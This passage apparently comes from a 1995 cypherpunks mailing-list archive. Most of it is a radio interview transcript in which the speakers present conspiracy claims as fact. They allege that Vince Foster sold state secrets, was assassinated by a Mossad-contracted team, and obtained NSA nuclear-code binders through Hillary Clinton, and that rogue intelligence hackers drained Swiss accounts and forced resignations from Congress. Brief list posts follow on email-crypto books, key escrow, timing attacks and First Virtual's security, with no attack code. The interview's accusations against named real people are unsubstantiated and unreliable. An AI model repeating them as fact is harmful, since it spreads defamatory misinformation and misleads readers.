is a tremendous need for money there, and they just weren't real 
cautious about where it was coming from. I think this thing about 
selling state secrets to the Israeli's and other countries was 
just a business. It was just for money. I don't think there was 
any ideology involved here at all, and it was one of many 
businesses. There is also insider trading going on here. There 
was the kickback on drugs and arms stuff and so the money has to 
go... you have to hide it some way, so it goes into Swiss bank 
accounts. And Foster would have known that, yeah, we're tracking 
this money off shore, but there is such a blizzard of information 
that unless somebody knows exactly what they are looking for they
would never find anything. They thought they could cover this up 
pretty well so Foster had... actually he had several accounts, and 
there was one in particular in this bank, bank at Villa Switsaria 
Italiano in Chaso on the Italian border. It is a little kind of a 
Mafia kind of community there reputed, and so he was taking the 
money in there for the payments from the Swiss. He was going to 
Geneva every six or eight months, and his curious one-day trips --
I don't think it was for sightseeing. 

QUINN: No. I'm sure he wasn't doing any real estate work for 
Arkansas. 

NORMAN: No. The whole thing about money laundering is... you know 
the money would go into a Swiss bank. Somebody would have to go 
physically and take it out and take it to a friendly bonded dealer 
or something like that, buy bearer bonds or other kinds of bonds 
or something that you could pledge as collateral for loans back 
in the states and turn it back into cash again legitimately, and 
so that is how money laundering works. Vince, in effect, was a 
bag man here because when they go to the White House all of a 
sudden they hit the jackpot. There was so much more goodies there, 
and, in fact, Deborah Goram, Foster's executive assistant, 
testified under oath that Foster had given her two, inch-thick 
ring binders from the National Security Agency to put in Bernie 
Nussbaum's safe in the White House. What were these binders? Well, 
I have talked to brokering experts on this stuff, and they say, 
"Look, when you are talking NSA binders in the White House, you 
are talking mainly one thing, and these are the codes and 
protocols by which the President authenticates himself when he 
has to call up the Pentagon to say 'let's go nuke somebody'." Now, 
what was Foster doing with these things? He had no business with 
them. He would have had no access to them. It would have to come 
from somebody with access to the Oval Office or the Presidential 
living quarters. 

QUINN: And, who would that be? 

NORMAN: Well, I think we know who we are talking about here. 

QUINN: We're talking about Hillary Clinton, aren't we? 

NORMAN: That's right. She has been under investigation in this 
whole thing, too, but I think that they had a strong case against 
Vince and not such a strong case against Hillary. But, you see 
what happened was, and this is another whole part of the story as 
to how they got onto Foster. Basically, there was a team of
computer hackers and computer intelligence guys in the CIA who 
were going through most databases. They found names there that 
they identified as being Foster and Hillary. They put them under 
surveillance actually before they went to the White House. I think 
it was between the election and the time that they went to the 
White House, and that's when the alarm bells went off. They had 
been surveilling these accounts for a while, and when Foster on 
July 1, 1993, bought a ticket to Geneva, a round-trip one-day 
ticket to Geneva, these guys said, "Oops, he's going to take the 
money. We're going to beat him to it." And, they went in. They 
hacked their way into the bank and obtained the necessary
authorization codes on this coded account for which no signature 
is required to withdraw money, by the way. 

QUINN: Right. 

NORMAN: They were able to effect their own technically legitimate 
wire transfer of this money back to the U.S. Treasury, where it 
sits in a holding account escrowed for use by the CIA. 

QUINN: So, the CIA empties Vince Foster's Swiss bank account of 
its ill-gotten money. 

NORMAN: Yeah, actually it wasn't the CIA. It was this sort of 
renegade vigilante group of guys they called the Fifth Column 
that has been out doing this stuff. They don't take any of the 
money for themselves. The money goes to the... 

QUINN: They just do it for fun? 

NORMAN: The CIA only gets the money. It is escrowed for use by 
the CIA but only when the CIA gets rid of a bunch of its bad 
apples there who've got dirty hands from drug kickbacks, arms. 

QUINN: Let's pick this story up. There was a meeting just before 
Vince Foster died on the eastern shore of Maryland in which 
Webster Hubbell, Vince Foster, and some others were present. 
Okay, this was just before Foster died. Pick up the story here. 

NORMAN: All right. Well, we mentioned July 1, 1993. Foster buys 
this round-trip ticket to Switzerland. They raid his account. 
They take out $2.73 million. Foster apparently calls up the bank 
to let them know he was coming. They say, "Oh, Vince don't you 
know you took the money out already?" Boing... that's when he
found out he was under investigation. That's when he got so 
mysteriously depressed. It had nothing to do with editorials in 
the Wall Street Journal. He had his bank account raided big time, 
and he knew he was under surveillance, or he knew he was under 
investigation. And, that started this curious chain of events. 
Webster Hubbell testified that not so much Vince was depressed, 
but he was worried. He was afraid to use the White House 
telephones. The guy had heart palpitations. He couldn't sleep at 
night. His doctor gave him a prescription for sleeping pills. His 
sister tried to get him to talk to some psychiatrist. He never 
got in touch with them. Instead, he hired a high-powered lawyer 
in Washington, Jim Hamilton, this big deal white-collar crime 
fix-it guy who handles people who get hauled up for Congressional 
hearings. And, then there is this curious meeting the weekend 
before Foster died. He and his wife, Lisa, go down to the eastern 
shore of Maryland for a getaway weekend, and then, by coincidence, 
they meet Hubbell and his wife down there. Hubbell, also from the 
Rose Law Firm, at the time the country's de-facto top law 
enforcement law officer because Janet Reno in effect was taking 
her orders from Hubbell. They go over to the estate of Michael 
Cardoza, who is the son-in-law of Nathan Landau, a big deal 
Democratic fund-raiser, and Cardoza is also the head of Clinton's 
legal defense fund. Supposedly, this was all poolside chit chat.
Baloney, it was damage control. They were trying to figure out 
how to contain this scandal from spreading to other people in the 
White House, and they were trying to lean on Vince to get him to, 
you know, cop a plea, go quietly, or shut up and don't talk about 
it. And, in fact, what my sources have told me is that there was 
actually a huge payment made to an account held by Lisa Foster, 
with more than $286,000, on the Friday before that meeting. 

QUINN: Wait a minute, on the Friday before that meeting, Lisa 
Foster's bank account gets a deposit of $286 million? 

NORMAN: $286,000, yeah. 

QUINN: I'm sorry, yeah, $286,000. Okay, so does she take it out? 

NORMAN: Well, I don't know what ever happened to that money. It 
is hard to tell where it came from even. It is all very 
mysterious to me, but it sure smells like hush money to me. It's 
like, "Look Vince, don't worry, we'll take care of your money." 

QUINN: You don't know if she wrote a check on it?

NORMAN: Well, I'm told that it came through the hands somehow of 
Sheila Anthony, who was Foster's sister, and at the time she was 
a "congressional liaison" person at the Justice Department, 
whatever a congressional liaison is. 

QUINN: So she takes the money to Foster, and Foster turns it down? 

NORMAN: Well, no... I think he probably accepted it, or it went 
there. But, apparently, he was having second thoughts, I think. 
You know, on the Monday after they came back from this meeting, 
the records showed, the public records showed, that he has a 
parade of people coming by his office in the White House saying, 
"Hey, how'd your weekend go, Vince? You cool with this? I mean, 
you on board with all of this? Everything okay?" you know. Then,... 

QUINN: A lot of very nervous people in the White House. 

NORMAN: That's right. Then, the day he died he had like a two-hour 
meeting with another person from the Arkansas contingent there. I 
think the problem was that they were afraid that Vince was going 
to talk or that he was going to crack under questioning, and 
here's a guy who was now, at this point, under intense 
surveillance. I mean, he had not only CIA counter intelligence 
people, but you had NSA. You had FBI surveilling him. There was a 
four-person IRS team we know was assigned to tail this guy, 
probably in connection with the money laundering aspect of the 
Swiss bank account. 

QUINN: God, this thing's got everything but floats in the... I 
mean all they need is Goofy, a big balloon with ropes on it 
following this guy around. 

NORMAN: You almost did. I mean, you had the Secret Service with 
a bomb-sniffing dog squad out there checking his car in the 
parking lot. The video tapes of that, gone. The video tapes of the 
room where they are stored, gone. I mean, this whole thing is 
massively covered up, and I guess it is for national security
reasons. 

QUINN: Well now, I understand that Foster had a meeting scheduled 
with Bill Clinton. I believe it was on a Wednesday. 

NORMAN: Right. 

QUINN: And, it was the Tuesday he was killed. 

NORMAN: Right. Exactly. The question is well, gee, was he going 
to drop something in the President's lap and blow the plausible 
deniability that he might have on this stuff. 

QUINN: Well, this Foster suicide thing is so sloppy. It leads me 
to believe that on Tuesday they thought he would take the money 
and shut up, and he didn't take it so they had to do something 
real quick. 

NORMAN: Well, that could be it or that even if he wanted to shut 
up maybe they were afraid he would crack under interrogation or 
something. You know, it is just somebody wanted him real dead, 
and there is a bunch of people who had ample reason for it. This 
was not suicide. It was not over depression. This was a political 
assassination carried out on U.S. soil by a foreign government. 
The Israelis were involved in this. There was apparently a three-
person Mossad-contracted team that went into the apartment that 
Foster had gone to that afternoon where he was apparently lured 
by a female person from the White House staff who I think still 
works in the White House. 

QUINN: Now, who would that be? 

NORMAN: Well, I... 

QUINN: Because, he had sex with her? 

NORMAN: That's the impression, yeah. 

QUINN: I mean, there was semen on his shorts. There was brownish-
blonde hair on his clothing and rug fibers all over him which may 
or may not have had to do with having sex on the floor. It might 
have been... 

NORMAN: No, I think that was because he was rolled up in a rug 
afterwards and taken over to Fort Marcy Park. Now, the question 
is, were elements of our intelligence community involved in 
helping to dispose of the body and cover it up some way? 

QUINN: Who is the woman in the White House? 

NORMAN: I can't say. 

QUINN: Patsy Thomason? 

NORMAN: No. I don't want to say. I suspect... 

QUINN: Dee Dee. Well, she's not there anymore. 

NORMAN: That name is known. I mean, she has been identified on 
these tapes apparently, but.... 

QUINN: I think Dee Dee and Bill are doing it, but that's just me. 
Anyway, let's get back to the story here. Okay, so I understand 
at least you are claiming that there is a videotape of Foster's 
murder? 

NORMAN: Well, of the people entering and leaving this apartment a 
few blocks from the White House where it apparently occurred. 

QUINN: Has anybody located this apartment? Do you know where it 
is? 

NORMAN: I don't know exactly where it is myself. I am told it is 
actually within a few blocks of the White House. 

QUINN: Okay, so they lure him here, and they pop him, and there 
is a videotape of it or there is a videotape of the people going 
in and out. Then, they go to Fort Marcy Park, and they dump him. 

NORMAN: Right. 

QUINN: Okay, and we've got a witness now that says they saw the 
two guys that fit the same description that Patrick Knowlton, the 
other witness, to Foster's car. He describes the one guy that 
threatens him. One of those people is one of the two that 
supposedly was walking Foster, who looked drunk to this guy, 
into the park, but he says that they laid him out. 

NORMAN: Yeah. I don't know too much about all that stuff, but 
what I know is this, that Paul Rodriguez is the Editor of Insight 
Magazine, that came up with this Mr. X source. When Forbes decided 
not to run the story for reasons that were kind of mysterious to 
me at the time, and while I was still there, they gave me 
permission to publish it elsewhere. And, as I approached Insight, 
because they are kind of a gutsy magazine, David Rodriguez made a 
whole bunch of calls around Washington trying to corroborate this 
stuff, and I think he was making some headway. Then, he gets this 
visit in person from some military intelligence guy from the 
Pentagon who comes to him and says, "Paul, lay off this story. 
You don't know what you're dealing with here." 

QUINN: No. I think we do know what we are dealing with here. 
We're dealing with the biggest scandal since maybe... 

NORMAN: And, you've got Israeli relations at stake here. You know, 
the intelligence community has a lot of joint ventures with the 
Israelis. They don't want to "queer" those things. I mean, we do 
business with those people a lot, and you know a lot of it is 
probably quite necessary, but you know there is a scandal here 
that dwarfs the Jonathan Pollard case by orders of magnitude 
really. 

QUINN: I want to discuss a couple of things with you. First of 
all, now it would appear that a bunch of Republicans picking 
Kenneth Starr to put him in charge of this investigation of 
Vince Foster and the Whitewater problem in Washington, D.C. On 
the surface, it looked like they were going for the jugular, but 
see, Mr. Starr has some background that leads back to the Inslaw 
case we discussed earlier in the show about the Promis software 
and stuff. He excused himself from that litigation. 

NORMAN: And, the reason was because he was the inside counsel for 
William French Smith at the Justice Department in 1982 at the 
time that the Inslaw software was expropriated by the government... 

QUINN: Okay. So he really is not in the position to be the pit 
bull to expose this. He is in a better position to get Clinton on 
whatever Republicans need to get him on and make sure that 
Republicans don't get burned here.
 
NORMAN: I think that's it. Yeah. 

QUINN: Okay, now. Given that that's the case and given that the 
Washington inside-the-beltway crowd on both sides of the aisle 
are trying to make sure that the fix is in on this, how do you 
think or what leads you to believe that this is going to come out, 
and through what channels? 

NORMAN: Well, again, it goes back to resources of mine. 
Basically, there are a few good guys in the intelligence 
community, particularly this handful of people in the so-called
Fifth Column, who are so incensed about this bipartisan coverup, 
the government's inability and unwillingness to deal with the high
level corruption here, they've just decided to take things into 
their own hands. They never had government authorization to go 
raid the foreign bank accounts, but.... 

QUINN: How many accounts are there? How many people in the 
government right now have Swiss bank accounts filled with money 
from BCCI, drug laundering, defense kickbacks, arms trades, I 
mean all of this nonsense? 

NORMAN: Not as many as two years ago. These guys have been out 
raiding these accounts. They've pulled back $2.5 billion, more 
than $2.5 billion with a "B" dollars from 300, 400, 500 of these 
accounts. There is probably 3,000 coded Swiss and other foreign 
bank accounts that they have been rifling through the computers on. 

QUINN: How can there be this many of them and it doesn't come out? 

NORMAN: It is because it is endemic corruption. The government is 
corrupt. Why should we give the President of South Korea $600 
million? ... country more powerful, more worth corrupting, more 
venal and with weaker controls for policing this stuff. 

QUINN: Well, because we don't believe it can happen here. 

NORMAN: That's right. We're Americans. Well, this is greed and 
money. But, there is.... 

QUINN: Well, it's murder too. 

NORMAN: That's right, and there have been hundreds of these 
accounts already raided, and nobody, NOBODY has been able to stand 
up and say, "I was robbed." Why? Because, the money came from 
exactly what you said -- kickbacks on drugs, kickbacks on arms, 
insider trading, and they never paid any taxes on this stuff. 
They've never disclosed it, and the minimum sentence for willful 
tax evasion is ten years, that's the minimum. So, what you have 
going on right now in Congress is basically, there is an Angel of 
Death. Actually, there are two I'm told. There is one on the 
Democratic side and one on the Republican side. 

QUINN: Now, do they make their rounds together? 

NORMAN: No. It's separately. What I'm told is that the people in 
Congress with these Swiss bank accounts, who have had these 
accounts, if they haven't already left, if they haven't had the 
good sense to already get their butts out of there, they have been 
delivered, hand delivered a brown paper envelope with transaction 
records of their Swiss bank accounts, and within a day or so they 
get a visit from this Angel of Death who says it's time for you 
to go, time to do some career planning, you're out of here, we 
don't want you in the government when the stuff hits the fan here, 
as it's gonna do in the spring apparently. The records are going 
to start coming out. It's going to be obvious. These vigilantes 
are just going to take this situation into their own hands and 
release this stuff, I'm convinced. 

QUINN: These people are real patriots. They could end up dead 
doing this. 

NORMAN: Some of them may already have. I think... but they've 
planned this quite well. I think they've got it down now. They 
know that if anything happens to them, that the stuff would just 
come out in a gush, so it would be counterproductive for.... 

QUINN: Yeah, but I mean is it going to come out in the 
mainstream media. You've got the Mena story being spiked a year 
ago by Katherine Graham at the Washington Post, and I've uncov... 
you, what I stumbled on a memo from Paul Keiser yesterday from the 
editor at the Washington Post who writes me in this memo a flat 
out blatant lie. He says that the authors of the Mena story, that 
was supposed to run January 26, 1995, in the Washington Post 
Outlook Section, had withdrawn the article before the Washington 
Post had decided to run it, and that's just a flat out lie. 

NORMAN: Well, it's technically probably true. But, what they've 
done, they've left those people dangling by a thread for like 6-8 
months. I don't blame them for taking the story elsewhere as the.... 

QUINN: Yeah, but no, but Jim they didn't. The type galleys had 
been laid, and the artwork had been done. It was supposed... they 
didn't pull it until the Thursday before the Sunday it was 
supposed to run. 

NORMAN: Right. Well, technically the Post can say, "Oh, we never 
quieted you..." That's what they told me at Forbes, too, about my 
story. Finally, I never got a good reason why my story didn't run 
at Forbes. Ultimately, they said, "Oh, we didn't trust your 
sources." But, actually what my immediate supervisor said, "We 
can't say this about Systematics," which was a big advertiser at 
Forbes, and we can't say this about the Israelis. 

QUINN: Yeah, right. 

NORMAN: That's why didn't run in Forbes. 

QUINN: Well, there's actually no proof that Systematics has 
deliberately delivered stolen software. I mean, they may not even 
know that the software was stolen, and it may be another version 
of it. 

NORMAN: Systematics is under heavy duty investigation, though, 
right now for money laundering, because once you set up a system 
for laundering covert funds for the government, who knows what 
else you can piggyback on top of that. The suspicion is that this 
was the quid pro quo here in return for laundering, supposedly, 
call it legitimate funds that the intelligence community can 
piggyback other stuff to. 

QUINN: Let's get back to the Angel of Death here and the 
resignations in Congress, which have been pretty much 
attributed by guys like Rush Limbaugh to the fact that Democrats 
just don't like being in the minority anymore, and they don't 
have the guts or stamina to stick it out the way the Republicans 
did for 40 years. And, some of that may be true, but how many of 
these people who have said that they are pulling their hats out 
of the ring... And, now we have two Republicans... How many of 
these people have been visited by this so-called Angel of Death? 
All of them? 

NORMAN: Well, the figures I've heard is that I think there's like 
25 or 26 so far since the last election who have decided they are 
not going to run again or had actually resigned and out of there, 
like Norman Minetta from Los Angeles[sic]. Of those, I'm told 
about 21 or 22 so far can be directly attributed to Swiss bank 
account problems. There is probably another dozen or so that 
are going to go that way. Again, there is an argument that, "Oh, 
we just can't stand the nasty politics in Washington anymore." 
Come on, give me a break. 

QUINN: Well, I like Patsy Schroeder. She wanted us to believe 
that now that the Democratic party is in such good shape she can 
leave it and it doesn't... did you see that? 

NORMAN: No.... 

QUINN: That was great. Oh yeah, now that.... 

NORMAN: Patsy Schroeder, somebody noted on the Internet that at 
the news conference where she was announcing she wasn't going to 
run, there had already been re-elect Schroeder bumper stickers 
printed up. I mean, she... take this guy Ron Coleman from Texas, 
a Congressman down there. He made his announcement at his 
supposed re-election campaign kickoff party. 

QUINN: You're kidding? This is right out of a... this is a movie. 

NORMAN: That's right. Listen, these people have been confronted. 
They've been given 24 hours basically to clean out their desks. 
That's what it amounts to. 

QUINN: So, they're gonna try and get all these people out who 
have Swiss bank accounts before it hits the fan. Now, when do you 
suppose that this is going to happen? Can you give us a timetable? 

NORMAN: Well, that's happening in tiers. I mean, we've already 
seen a bunch of departures. I think that the early spring is the 
timetable. You know, Wall Street is going to get hit with this 
stuff too. Now, every year in the spring, soon after the first of 
the year, after these guys collect their year-end bonuses, you have 
a big exodus. But, I'm told Wall Street is going to get hit with 
this big time this year because those guys were in it too. You 
gotta remember, there was so much money sloshing around here... 

QUINN: Yeah, really. 

NORMAN: ... from arms deals. You could not launder all of that 
money without the knowing, willing cooperation and participation 
of major banks, major brokerage houses, and... 

QUINN: Goldman Sachs possibly? 

NORMAN: Oh yeah. Look, Goldman... 

QUINN: I always found it strange that Robert Rubin showed up when 
he did. 

NORMAN: This Goldman, they were the chief investment bankers to 
Robert Maxwell in the U.K., helped Maxwell loot a half a billion 
dollars out of his pension funds, and it now costs a huge amount 
of money for a settlement there. 

QUINN: It sounds like somebody's calling you. 

NORMAN: They still have the bond for ADFA, the Arkansas Development... 

QUINN: Whoa, hold on a second. What's that? 

NORMAN: That's another one of these... 

QUINN: Well no, I know what it is. You're telling me that Goldman 
Sachs was holding the bonds for the Arkansas Development? 

NORMAN: No, they were the underwriter on a bunch of these $8 
billion or so of bonds that ADFA marketed to who knows whom. 

QUINN: Oh man. You know, I have transactions on my desk at home, 
$80 million of money transfers to the Fuji Bank in the Cayman 
Islands from ADFA, the Arkansas Development Financial Authority, 
who I believe never had more than $8 million to begin with. I 
mean, where did they get $80 million, and what's it going to the 
Fuji Bank for? The interest rate? Come on, the Switzerland of the 
Caribbean. Jim, I gotta let you go. I gotta wrap this up here, 
but I want to thank you for joining us this morning. 

NORMAN: It's a pleasure. I'll keep you posted as more develops. 
There's going to be more coming down the pike here soon. 

QUINN: Well, I'll tell you what. I'm gonna call you later on 
today. I'll give you my home number. Let's stay in touch because 
if what you say is true and if there are truly some patriots in 
the intelligence community who are finally going to blow the 
whistle on this. By the way, all of these resignations and the 
Angel of Death and all of this, I think is evidence that these 
people know that this is inevitable that this is going to come 
out. 

NORMAN: It's like AIDS. I think there are a bunch of people back 
before the last election who realized they, in fact, have slept 
with the wrong woman or person, and they did not run again, but 
there has been denial, denial, denial by a bunch of these people. 
Finally, I think it's like the Angel of Death is finally coming
around saying, "You gotta go. Bye. You're outta here." 

*************************** CREDITS******************************

If you are a talk show host and want to contact either one of 
these guys for an interview you can reach James Norman at MEDIA 
BYPASS MAGAZINE, 1-800-4-BYPASS 

Jim Quinn can be contacted at WRRK, 7 Parkway Center, Suite 780, 
Pittsburgh, PA 15220, Fax Number 412-928-9290, Internet address 
is quinn@sgi.net homepage at http://www.warroom.com or Compuserve
72662,3507.


=======================================================================
Visit our Web site at http://www.the-spa.com/constitution/
If you need help setting up your own Web site, call us at 413/786-6802.
=======================================================================







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Date: Wed, 13 Dec 1995 11:34:09 +0800
To: REES@rmcs.cranfield.ac.uk
Subject: Re: Plea for information
Message-ID: <Pine.BSD.3.91.951211221025.27737B-100000@ahcbsd1.ovnet.com>
MIME-Version: 1.0
Content-Type: text/plain


 
 
Friend, 
 
 
On 12 07 95 you sent a Plea for information to cypherpunks- 
@toad.com. 
 
You said: 
 
  I would be interested in learning more about the politics and 
  mathematics of cryptography.... 
 
  [snip] 
 
  ...I would like to know how best to understand cryptography - 
  I have a textbook on the basic mathematical concepts under- 
  lying the techniques but it is too advanced for my current 
  knowledge in this field (A-level - ie. end of high school), 
  please can you suggest a good starting place for me. 
 
 
I suggest you lay aside the maths for a time and buy a copy 
of: 
 
    Bruce Schneier 
    E-Mail Security. How to Keep Your Electronic Messages 
      Private 
    John Wiley & Sons, Inc 
    1995 
 
 
I enquired this morning at Wiley's NY office and was told: 
 
    (a) the book is available in the UK 
 
    (b) the phone number of Wiley's Chichester office is 
 
                44 1243 779 777 
 
 
Here's the book's Contents in Brief: 
 
Part I:  Privacy and Electronic Mail 
             Chapter   1: The Problem 
             Chapter   2: Encryption 
             Chapter   3: Key Management 
             Chapter   4: Authentication 
             Chapter   5: Certificates 
             Chapter   6: Keeping Your Private Key Private 
             Chapter   7: Odds and Ends 
             Chapter   8: Patents, Governments, and Export Laws 
 
Part II: Achieving Electronic-Mail Privacy 
             Chapter   9: Requirements and Features 
             Chapter  10: Privacy Enhanced Mail (PEM) 
             Chapter  11: Pretty Good Privacy (PGP) 
             Chapter  12: Comparing PGP and PEM 
             Chapter  13: Attacks Against PGP and PEM 
 
Appendix A: Pretty Good Privacy 
Appendix B: Privacy Enhanced Mail 
Index 
 
 
Appendix A = PGP User's Guide. Volume I: Essential Topics. 
Appendix B = Request for Comments: 1421. 
 
 
To study the book --not the same thing as just reading it-- 
you will need PGP to experiment with.  An ingenious lad 
should have little trouble... 
 
After you have some concrete experience, it'll be easier to 
see the relevance of the maths. 
 
As regards "the politics...of cryptography," this excerpt 
from the book's Foreward by William Murray should pique your 
interest: 
 
  To the extent that E-mail proves to be important, we can 
  expect to see many attempts on the part of government 
  to coopt it in much the same way that they have coopted 
  the paper mail system.  The excuses that it will use to 
  do so will be related to security.  It will repeat the 
  claim of Cromwell's government ["many  dangerous and wick- 
  ed designs...are daily contrived against the welfare of 
  this Commonwealth"] and will create whatever evidence is 
  required to convince the people of the validity of the 
  claim. Arguments to the contrary notwithstanding, the real 
  motive will be to maintain political control and influence. 
 
 
Oklahoma?  Whatever... 
 
 
Cordially, 
 
Jim 
 
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Pat Farrell" <pfarrell@netcom.com>
Date: Wed, 13 Dec 1995 11:34:00 +0800
To: cypherpunks@toad.com
Subject: RE: ViaCrypt supports CKE in PGP
Message-ID: <80361.pfarrell@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In message Mon, 11 Dec 1995 14:45:55 -0600,
  "Robichaux, Paul E" <perobich@ingr.com>  writes:

> In today's mailbox I got a pack of marketing slicks from ViaCrypt.
[liberally elided]
> The biggie, though, are these:
> "Encryption automatically includes Corporate Access Key as
> additional  recipient (option)" and
> "Key selection/display dialogs show only keys certified by
> Corporate  Access Key (option)"
> So, real CKE will soon be available from an unexpected source. I'm not
> sure  whether to be excited or dismayed.


I believe this is a good thing (tm).
This is a vendor with strong crypto implementing Key Escrow for
the only known commercially viable market: data recovery of long
term storage.

In all of the NIST meetings that I've attended, industry says
there is a market for key escrow for data recovery when your
key  programmer "falls in love and moves to a warm water island"

They also say there is no market for key escrow for communication,
we can simply resend lost messages.

Commercial Key Escrow is, by definition, voluntary. You have to pay
to get it escrowed, stored, and returned. CKE is not GAK.

I bet its not exportable.

Pat

Pat Farrell    Grad Student      http://www.isse.gmu.edu/students/pfarrell
Info. Systems & Software Engineering, George Mason University, Fairfax, VA
PGP key available on homepage               #include <standard.disclaimer>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Martin Diehl" <mdiehl@dttus.com>
Date: Thu, 14 Dec 1995 12:50:44 +0800
To: cypherpunks@toad.com
Subject: Re[2]: Timing Cryptanalysis Attack
Message-ID: <9511118187.AA818747282@cc2.dttus.com>
MIME-Version: 1.0
Content-Type: text/plain


     OTOH, maybe we _should_ try for constant computation time and then try 
     for *random* delay time.  Remember that _we_ will spend a lot of real 
     time arguing whether the *random* delay is really _random_
     
     Martin G. Diehl
     
     
     _______________________ Reply Separator __________________________ 
     Subject: Re: Timing Cryptanalysis Attack
     Author:  Nathaniel Borenstein <nsb+limbo@nsb.fv.com> at Internet-usa 
     Date:    12/11/95 2:41 PM
     
     
     Hey, don't go for constant time, that's too hard to get perfect.  Add 
     a *random* delay.  This particular crypto-flaw is pretty easy to fix. 
     (See, I'm not *always* arguing the downside of cryptography!)
     
     It is worth noting, however, the extent to which "secure" 
     cryptographic protocols keep needing to get fixed one last time....  
     -- Nathaniel --------
     Nathaniel Borenstein <nsb@fv.com>       | (Tense Hot Alien In Barn) 
     Chief Scientist, First Virtual Holdings | VIRTUAL YELLOW RIBBON:
     FAQ & PGP key: nsb+faq@nsb.fv.com       | 
     http://www.netresponse.com/zldf





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Wed, 13 Dec 1995 05:54:07 +0800
To: Scott Binkley <SBinkley@atitech.ca>
Subject: Re: EXON
In-Reply-To: <E343943A01502C79@-SMF->
Message-ID: <Pine.ULT.3.91.951211225521.15475D-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On 11 Dec 1995, Scott Binkley wrote:

> Could someone please explain to me what this "EXON" thing is??

A nucleic acid chain (RNA or DNA) is composed of exons, which are 
"active" sequences of nucleotides that are expressed as polypeptides, and 
"introns," what is known as "junk DNA." Only about 2% of the 6 billion or 
so base pairs that make up the human genome are exons.

(There is some controversy in molecular biology circles as to whether 
"junk DNA" is really "junk" just because it doesn't build proteins. It 
could perform a regulatory or "frame-check" function.)

In cryptographic applications, the sequence of nucleotides can only be 
considered random inasmuch as the ratio of exon to intron is unknown.

Hence the inside joke. You see?

There is also a United States Senator James Exon, D-Nebraska I believe, who 
has introduced several restrictive and silly pieces of legistlation 
concerning online privacy rights. "The Exon Bill" claims to hold individuals
and online service providers liable for the transmission of undefined 
"inappropriate" material, such as pornography.

So maybe that's what you've heard people talking about.

Information on Senator Exon is available at all the usual online freedom 
and privacy haunts:

eff.org
cdt.org
epic.org
aclu.org

- -rich

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMM0qn43DXUbM57SdAQFcQAQAwfRfYqWQN2EMfj2Rzd3IkJah4O87I9/X
bkmpe35NL0EC2t2BqNcUbQeQ8BST2pnqrtGU8oeqBJFqLejicK+0gbUGTD3Lj2sJ
i3/B41R9LMAOhwgRVAteO0YgDB+taVBo4Fuu5D1fOhZX9JDNjqq/LMTJ/r+AnPi6
jEwSwvOnvAk=
=rpMA
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Thu, 14 Dec 1995 07:28:02 +0800
To: stewarts@ix.netcom.com (Bill Stewart)
Subject: Re: More FUD from First Virtual [NOISE]
In-Reply-To: <199512120654.WAA17948@ix12.ix.netcom.com>
Message-ID: <199512120743.XAA24011@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Besides, if you hack FV you've got the money :-)

	Uh, no you don't. I can't think of any ways you could hack FV
and actually make money at it, because in the end the credit card
would just get a chargeback.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Wed, 13 Dec 1995 11:33:35 +0800
To: cypherpunks@toad.com
Subject: Re: Timing Cryptanalysis Attack
Message-ID: <199512120058.BAA25991@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



"Perry E. Metzger" <perry@piermont.com> writes:

 > Timings like the ones listed are trivial to take in
 > establishing things like SSL sessions, or Photuris sessions.
 > The danger is to online protocols, not to PGP.

This must be a new and interesting definition of the word
"trivial" with which I was previously unfamiliar.

Quite frankly, I would be extremely surprised if anyone mounted a
successful hostile attack against a server's RSA certificate
using timings of remotely initiated SSL sessions outside of a
controlled laboratory environment.

"Timing Cryptanalysis" is one of those really cute "obvious with
20-20 hindsight" discoveries, but not one which is likely to be
reliably employed by an opponent except under very carefully
controlled circumstances.

Peter Trei and others have already outlined excellent reasons for
such skepticism, so I won't bother rehashing them here.

 > Any reason you felt you had to say this anonymously?

Yes.  I wanted to try the nifty WWW-based remailer at
http://www.replay.com/remailer/anon.html.  Also, it's nice to
have a pseudo-anonymous identity now that government regulation
of the Net is looming on the horizon. Feel free to compare my
writing style, margins, and quote string with other posts on the
list in order to determine my likely "real life" identity.

                                      -Bourbaki 137







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Wed, 13 Dec 1995 01:24:14 +0800
To: sameer@c2.org>
Subject: Hacking FV is just no fun (was Re: More FUD from First Virtual [NOISE])
In-Reply-To: <199512120743.XAA24011@infinity.c2.org>
Message-ID: <IknLod_Mc50eI2iw5O@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


Watching this thread has been fascinating.  I want to underscore and
summarize a tiny bit.

First, I commented about the aspects of FV's system that made it
particularly hard to mount a large-scale automated attack against the FV
transaction system.  Then, David Wagner asked:

> Is it just me, or does this sound like a challenge?
.....
> Maybe Sameer will create a Hack FV page :-)
> Or maybe NB will offer a $1000 bug bounty to anyone who can successfully
> forge a transaction in FV's system (since it's so foolproof)...

Before I could answer, Sameer said more or less what I would have said,
although I'm sure he didn't think he was offering FV's position:

> 	FV isn't worth it.

This is absolutely true in the sense that a simple one-time attack on FV
is well-understood and easy to mount.  (For those of you who haven't
seen it, I recommend that you read our paper on lessons from First
Virtual's first full year in operation, available at
ftp::/ftp.fv.com/pub/nsb/fv-austin.{ps,txt}.  Among other things, it
spells out in precise detail how to break the FV transaction system --
see Appendix A, Question 25:  "How can a criminal break First Virtual's
system, and does it matter?"

Unlike other systems, FV doesn't claim to be "foolproof" -- quite the
contrary, we very deliberately tell you exactly how to break the system,
and we focus on limiting the damage that can be done by such an attack. 
